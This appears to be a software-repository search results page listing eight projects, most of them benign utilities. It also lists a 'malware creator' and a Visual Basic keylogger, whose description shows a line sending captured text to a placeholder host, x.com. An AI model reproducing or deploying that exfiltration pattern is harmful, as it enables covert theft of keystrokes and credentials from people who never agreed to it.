Showing 8 open source projects for "command-line"

View related business solutions
  • Our Free Plans just got better! | Auth0 Icon
    Our Free Plans just got better! | Auth0

    With up to 25k MAUs and unlimited Okta connections, our Free Plan lets you focus on what you do bestโ€”building great apps.

    You asked, we delivered! Auth0 is excited to expand our Free and Paid plans to include more options so you can focus on building, deploying, and scaling applications without having to worry about your security. Auth0 now, thank yourself later.
    Try free now
  • Automate contact and company data extraction Icon
    Automate contact and company data extraction

    Build lead generation pipelines that pull emails, phone numbers, and company details from directories, maps, social platforms. Full API access.

    Generate leads at scale without building or maintaining scrapers. Use 10,000+ ready-made tools that handle authentication, pagination, and anti-bot protection. Pull data from business directories, social profiles, and public sources, then export to your CRM or database via API. Schedule recurring extractions, enrich existing datasets, and integrate with your workflows.
    Explore Apify Store
  • 1
    TorRefresher-proxy

    TorRefresher-proxy

    One-click Tor IP refresher with bridge support built-in

    TorRefresher is a lightweight Windows tray application designed to make using Tor simple and efficient. Built to work with the official Tor Expert Bundle, it gives you full control over your Tor connection without needing to touch the command line. ๐Ÿ”„ Automatic IP Rotation โ€“ Refresh your Tor circuit on a timer of your choice ๐Ÿ–ฑ One-Click Manual Refresh โ€“ Instantly change your IP from the tray ๐ŸŒ Exit Node Info โ€“ See your current IP and country at a glance ๐Ÿ”’ Bridge Mode Support โ€“ Works in censored regions with custom bridges โšก Fast & Lightweight โ€“ Runs silently in the background Setup is simple: download the Tor Expert Bundle, point TorRefresher to your tor.exe, and youโ€™re ready to go. ...
    Downloads: 0 This Week
    Last Update:
    See Project
  • 2
    Viral Tool

    Viral Tool

    A smart malware creator to create 26 types of malwares.

    Viral Tool is a smart easy-to-use software specially designed for one sole purpose "Create Malwares" . In this era of computers, threats have increased more then before & that's why software's like these come in handy. With this software we can create malwares in different formats. We can view & edit the source code of those malwares. Ethical Hackers can use this software in a secure way during pen testing.
    Leader badge
    Downloads: 3 This Week
    Last Update:
    See Project
  • 3

    RHIPS

    Rhythm Host Intrusion Prevent System is a log file monitor IDS/IPS

    Rhythm Host Intrusion Prevention System is a log file monitor IDS/IPS for Windows. RHIPS can alert you via email when it matches detection criteria or execute a custom command. For alerting and response specify the number of instances before alerting or taking action. If specifying a command action another command can be run later on a timed basis. Port to IP address correlation allows for the connecting IP address to be identified and action taken against it.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 4
    ActiveLock is an open-source copy protection, software licensing framework for all development enviroments supporting COM+ architecture. Core DLL available in VB2008 and VB6. Samples in C++, C#, Excel/Access VBA and keygens in PHP, ASP.NET available.
    Downloads: 2 This Week
    Last Update:
    See Project
  • Total Network Visibility for Network Engineers and IT Managers Icon
    Total Network Visibility for Network Engineers and IT Managers

    Network monitoring and troubleshooting is hard. TotalView makes it easy.

    This means every device on your network, and every interface on every device is automatically analyzed for performance, errors, QoS, and configuration.
    Learn More
  • 5
    Janilogger

    Janilogger

    Visual Basic based keylogger program

    ...And send the collected data to website panel. The asp file send datas to database. For example: You uploaded your log.asp to x.com . Janilogger sends datas to your database via log.asp with this command Webbrowser1.Navigate("http://www.x.com/log.asp?yaz=text1.text") -Log.asp included in source files
    Downloads: 0 This Week
    Last Update:
    See Project
  • 6
    The Password tools bundle is one application combining three tools - the Analyser (shows the "strength" of your password, the Generator (generates "strong" passwords) and the Manager (stores passwords securely using Rijndael).
    Downloads: 1 This Week
    Last Update:
    See Project
  • 7
    This program generates random alphanumeric passwords untill 80 signs long and allows the user to change length and amount of the passwords to generate. You can also choose for passwords with lower/higher case, lower case and no numbers.
    Downloads: 0 This Week
    Last Update:
    See Project
  • 8
    A command line utility written in Visual Basic to assist system administrators at institutions such as schools to minimise the use and storage of inappropriate material in Server shares. User-definable rules for file deletion can be created.
    Downloads: 0 This Week
    Last Update:
    See Project
  • Previous
  • You're on page 1
  • Next